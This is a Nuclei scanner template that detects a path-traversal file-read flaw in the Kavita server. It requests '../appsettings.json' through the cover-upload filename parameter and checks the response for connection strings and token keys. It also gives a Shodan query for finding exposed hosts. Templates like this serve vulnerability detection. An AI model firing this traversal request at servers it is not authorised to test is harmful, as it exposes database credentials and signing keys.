id: kavita-lfi

info:
  name: Kavita - Local File Inclusion
  author: arafatansari
  severity: medium
  description: |
    Kavita - Path Traversal is vulnerable to local file inclusion via abusing the Path Traversal filename parameter of the /api/image/cover-upload.
  reference:
    - https://huntr.dev/bounties/2eef332b-65d2-4f13-8c39-44a8771a6f18/
  metadata:
    verified: true
    shodan-query: http.html:"kavita"
  tags: kavita,lfi,huntr
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cwe-id: CWE-22

requests:
  - method: GET
    path:
      - '{{BaseURL}}/api/image/cover-upload?filename=../appsettings.json'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"ConnectionStrings":'
          - '"Path":'
          - '"TokenKey":'
        condition: and

      - type: status
        status:
          - 200

# Enhanced by mp on 2023/01/15
